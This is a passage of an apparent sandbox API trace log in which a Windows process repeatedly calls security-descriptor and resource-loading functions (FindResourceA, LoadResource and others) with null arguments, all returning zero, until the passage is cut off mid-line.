0 [0069.954] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.954] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.954] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.954] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.954] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.954] LockResource (hResData=0x0) returned 0x0 [0069.954] FreeResource (hResData=0x0) returned 0 [0069.954] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.954] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.954] LockResource (hResData=0x0) returned 0x0 [0069.954] FreeResource (hResData=0x0) returned 0 [0069.954] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.954] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.954] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.954] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.955] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.955] LockResource (hResData=0x0) returned 0x0 [0069.955] FreeResource (hResData=0x0) returned 0 [0069.955] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.955] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.955] LockResource (hResData=0x0) returned 0x0 [0069.955] FreeResource (hResData=0x0) returned 0 [0069.955] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.955] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.955] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.955] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.955] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.955] LockResource (hResData=0x0) returned 0x0 [0069.955] FreeResource (hResData=0x0) returned 0 [0069.955] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.955] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.955] LockResource (hResData=0x0) returned 0x0 [0069.955] FreeResource (hResData=0x0) returned 0 [0069.955] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.955] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.955] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.955] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.955] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.955] LockResource (hResData=0x0) returned 0x0 [0069.955] FreeResource (hResData=0x0) returned 0 [0069.955] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.955] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.955] LockResource (hResData=0x0) returned 0x0 [0069.955] FreeResource (hResData=0x0) returned 0 [0069.955] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.955] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.955] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.955] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.955] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.955] LockResource (hResData=0x0) returned 0x0 [0069.955] FreeResource (hResData=0x0) returned 0 [0069.955] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.955] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.955] LockResource (hResData=0x0) returned 0x0 [0069.955] FreeResource (hResData=0x0) returned 0 [0069.955] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.955] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.955] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.955] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.955] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.955] LockResource (hResData=0x0) returned 0x0 [0069.955] FreeResource (hResData=0x0) returned 0 [0069.955] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.955] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.956] LockResource (hResData=0x0) returned 0x0 [0069.956] FreeResource (hResData=0x0) returned 0 [0069.956] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.956] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.956] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.956] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.956] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.956] LockResource (hResData=0x0) returned 0x0 [0069.956] FreeResource (hResData=0x0) returned 0 [0069.956] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.956] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.956] LockResource (hResData=0x0) returned 0x0 [0069.956] FreeResource (hResData=0x0) returned 0 [0069.956] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.956] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.956] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.956] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.956] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.956] LockResource (hResData=0x0) returned 0x0 [0069.956] FreeResource (hResData=0x0) returned 0 [0069.956] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.956] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.956] LockResource (hResData=0x0) returned 0x0 [0069.956] FreeResource (hResData=0x0) returned 0 [0069.956] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.956] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.956] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.956] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.956] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.956] LockResource (hResData=0x0) returned 0x0 [0069.956] FreeResource (hResData=0x0) returned 0 [0069.956] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.956] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.956] LockResource (hResData=0x0) returned 0x0 [0069.956] FreeResource (hResData=0x0) returned 0 [0069.956] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.956] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.956] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.956] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.956] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.956] LockResource (hResData=0x0) returned 0x0 [0069.956] FreeResource (hResData=0x0) returned 0 [0069.956] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.956] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.957] LockResource (hResData=0x0) returned 0x0 [0069.957] FreeResource (hResData=0x0) returned 0 [0069.957] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.957] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.957] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.957] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.957] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.957] LockResource (hResData=0x0) returned 0x0 [0069.957] FreeResource (hResData=0x0) returned 0 [0069.957] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.957] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.957] LockResource (hResData=0x0) returned 0x0 [0069.957] FreeResource (hResData=0x0) returned 0 [0069.957] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.957] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.957] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.957] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.957] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.957] LockResource (hResData=0x0) returned 0x0 [0069.957] FreeResource (hResData=0x0) returned 0 [0069.957] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.957] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.957] LockResource (hResData=0x0) returned 0x0 [0069.957] FreeResource (hResData=0x0) returned 0 [0069.957] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.957] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.957] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.957] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.957] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.957] LockResource (hResData=0x0) returned 0x0 [0069.957] FreeResource (hResData=0x0) returned 0 [0069.957] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.957] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.957] LockResource (hResData=0x0) returned 0x0 [0069.957] FreeResource (hResData=0x0) returned 0 [0069.957] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.957] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.957] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.957] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.957] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.957] LockResource (hResData=0x0) returned 0x0 [0069.957] FreeResource (hResData=0x0) returned 0 [0069.957] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.957] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.958] LockResource (hResData=0x0) returned 0x0 [0069.958] FreeResource (hResData=0x0) returned 0 [0069.958] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.958] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.958] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.958] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.958] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.958] LockResource (hResData=0x0) returned 0x0 [0069.958] FreeResource (hResData=0x0) returned 0 [0069.958] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.958] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.958] LockResource (hResData=0x0) returned 0x0 [0069.958] FreeResource (hResData=0x0) returned 0 [0069.958] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.958] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.958] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.958] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.958] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.958] LockResource (hResData=0x0) returned 0x0 [0069.958] FreeResource (hResData=0x0) returned 0 [0069.958] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.958] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.958] LockResource (hResData=0x0) returned 0x0 [0069.958] FreeResource (hResData=0x0) returned 0 [0069.958] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.958] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.958] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.958] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.958] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.958] LockResource (hResData=0x0) returned 0x0 [0069.958] FreeResource (hResData=0x0) returned 0 [0069.958] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.958] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.958] LockResource (hResData=0x0) returned 0x0 [0069.958] FreeResource (hResData=0x0) returned 0 [0069.958] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.958] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.958] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.958] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.958] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.958] LockResource (hResData=0x0) returned 0x0 [0069.958] FreeResource (hResData=0x0) returned 0 [0069.958] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.959] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.959] LockResource (hResData=0x0) returned 0x0 [0069.959] FreeResource (hResData=0x0) returned 0 [0069.959] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.959] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.959] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.959] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.959] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.959] LockResource (hResData=0x0) returned 0x0 [0069.959] FreeResource (hResData=0x0) returned 0 [0069.959] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.959] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.959] LockResource (hResData=0x0) returned 0x0 [0069.959] FreeResource (hResData=0x0) returned 0 [0069.959] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.959] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.959] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.959] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.959] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.959] LockResource (hResData=0x0) returned 0x0 [0069.959] FreeResource (hResData=0x0) returned 0 [0069.959] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.959] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.959] LockResource (hResData=0x0) returned 0x0 [0069.959] FreeResource (hResData=0x0) returned 0 [0069.959] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.959] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.959] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.959] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.959] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.959] LockResource (hResData=0x0) returned 0x0 [0069.959] FreeResource (hResData=0x0) returned 0 [0069.959] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.959] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.959] LockResource (hResData=0x0) returned 0x0 [0069.959] FreeResource (hResData=0x0) returned 0 [0069.959] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.959] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.959] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.959] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.959] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.959] LockResource (hResData=0x0) returned 0x0 [0069.959] FreeResource (hResData=0x0) returned 0 [0069.960] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.960] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.960] LockResource (hResData=0x0) returned 0x0 [0069.960] FreeResource (hResData=0x0) returned 0 [0069.960] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.960] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.960] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.960] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.960] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.960] LockResource (hResData=0x0) returned 0x0 [0069.960] FreeResource (hResData=0x0) returned 0 [0069.960] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.960] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.960] LockResource (hResData=0x0) returned 0x0 [0069.960] FreeResource (hResData=0x0) returned 0 [0069.960] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.960] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.960] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.960] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.960] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.960] LockResource (hResData=0x0) returned 0x0 [0069.960] FreeResource (hResData=0x0) returned 0 [0069.960] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.960] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.960] LockResource (hResData=0x0) returned 0x0 [0069.960] FreeResource (hResData=0x0) returned 0 [0069.960] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.960] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.960] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.960] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.960] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.960] LockResource (hResData=0x0) returned 0x0 [0069.960] FreeResource (hResData=0x0) returned 0 [0069.960] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.960] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.960] LockResource (hResData=0x0) returned 0x0 [0069.960] FreeResource (hResData=0x0) returned 0 [0069.960] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.960] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.960] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.961] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.961] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.961] LockResource (hResData=0x0) returned 0x0 [0069.961] FreeResource (hResData=0x0) returned 0 [0069.961] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.961] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.961] LockResource (hResData=0x0) returned 0x0 [0069.961] FreeResource (hResData=0x0) returned 0 [0069.961] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, 